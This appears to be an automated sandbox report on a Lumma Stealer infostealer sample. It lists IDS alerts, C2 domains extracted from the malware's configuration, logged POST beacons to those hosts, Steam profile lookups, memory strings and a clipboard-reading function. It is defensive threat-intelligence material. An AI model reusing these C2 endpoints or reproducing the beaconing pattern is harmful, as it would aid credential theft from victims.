    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49711 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 104.21.4.136:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49717 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49714 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49714 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49713 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49716 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49716 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49720 -> 172.67.189.2:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49718 -> 172.67.208.139:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49720 -> 172.67.189.2:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49718 -> 172.67.208.139:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49715 -> 172.67.162.108:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49715 -> 172.67.162.108:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: offensivedzvju.shop
    Source: Malware configuration extractorURLs: gutterydhowi.shop
    Source: Malware configuration extractorURLs: stogeneratmns.shop
    Source: Malware configuration extractorURLs: lootebarrkeyn.shop
    Source: Malware configuration extractorURLs: vozmeatillu.shop
    Source: Malware configuration extractorURLs: ghostreedmnu.shop
    Source: Malware configuration extractorURLs: drawzhotdog.shop
    Source: Malware configuration extractorURLs: fragnantbui.shop
    Source: Malware configuration extractorURLs: reinforcenh.shop
    Source: Joe Sandbox ViewIP Address: 104.21.4.136 104.21.4.136
    Source: Joe Sandbox ViewIP Address: 172.67.189.2 172.67.189.2
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offensivedzvju.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vozmeatillu.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fragnantbui.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stogeneratmns.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: reinforcenh.shop
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: performenj.shop
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: lootebarrkeyn.shop
    Source: global trafficDNS traffic detected: DNS query: gutterydhowi.shop
    Source: global trafficDNS traffic detected: DNS query: ghostreedmnu.shop
    Source: global trafficDNS traffic detected: DNS query: offensivedzvju.shop
    Source: global trafficDNS traffic detected: DNS query: vozmeatillu.shop
    Source: global trafficDNS traffic detected: DNS query: drawzhotdog.shop
    Source: global trafficDNS traffic detected: DNS query: fragnantbui.shop
    Source: global trafficDNS traffic detected: DNS query: stogeneratmns.shop
    Source: global trafficDNS traffic detected: DNS query: reinforcenh.shop
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: performenj.shop
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240183729.0000000003278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240183729.0000000003278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240183729.0000000003278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e199731
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.c
    Source: RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: RegAsm.exe, 00000003.00000002.2240183729.0000000003278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTS
    Source: RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=gC
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamaoE
    Source: RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drawzhotdog.shop/
    Source: RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fragnantbui.shop/api
    Source: RegAsm.exe, 00000003.00000002.2239609640.0000000000EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ghostreedmnu.shop/
    Source: RegAsm.exe, 00000003.00000002.2239609640.0000000000EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ghostreedmnu.shop/api
    Source: RegAsm.exe, 00000003.00000002.2239685477.0000000000EE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gutterydhowi.shop/api
    Source: RegAsm.exe, 00000003.00000002.2239685477.0000000000EE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gutterydhowi.shop/apiO
    Source: RegAsm.exe, 00000003.00000002.2239609640.0000000000EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offensivedzvju.shop/
    Source: RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offensivedzvju.shop/W
    Source: RegAsm.exe, 00000003.00000002.2239685477.0000000000EE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://performenj.shop/
    Source: RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://performenj.shop/6&
    Source: RegAsm.exe, 00000003.00000002.2239609640.0000000000EBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://performenj.shop/api
    Source: RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://performenj.shop/apit
    Source: RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://performenj.shop/pi
    Source: RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop/d&
    Source: RegAsm.exe, 00000003.00000002.2239609640.0000000000EBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2239685477.0000000000EE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: RegAsm.exe, 00000003.00000002.2239609640.0000000000EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/N
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240183729.0000000003278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stogeneratmns.shop/&-7
    Source: RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stogeneratmns.shop/api
    Source: RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stogeneratmns.shop/apiJ
    Source: RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240183729.0000000003278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vozmeatillu.shop/
    Source: RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vozmeatillu.shop/api
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.6:49710 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.6:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49717 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.6:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49719 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.189.2:443 -> 192.168.2.6:49720 version: TLS 1.2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00439000 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00439000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00439000 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00439000

    System Summary

    barindex
    .NET source code contains very large array initializations
    Source: 3ZD5tEC5DH.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 364544
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004104803_2_00410480
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004476003_2_00447600
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FEBC3_2_0040FEBC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0044004B3_2_0044004B
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004010003_2_00401000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0044B0203_2_0044B020
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004450E03_2_004450E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004340F53_2_004340F5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004091F03_2_004091F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004012A73_2_004012A7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042A3453_2_0042A345
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0044B3003_2_0044B300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A3C03_2_0040A3C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042C3903_2_0042C390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004493903_2_00449390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004074703_2_00407470
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B4703_2_0040B470
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040E4703_2_0040E470
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004054003_2_00405400
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004114203_2_00411420
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042D56C3_2_0042D56C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041E52C3_2_0041E52C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042D58E3_2_0042D58E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004376203_2_00437620
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004097373_2_00409737
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004037903_2_00403790
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004327B03_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004088103_2_00408810
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042C8913_2_0042C891
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004499703_2_00449970
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A9103_2_0040A910
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409A023_2_00409A02
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00445AD03_2_00445AD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00449B603_2_00449B60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042BB003_2_0042BB00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00427B0F3_2_00427B0F
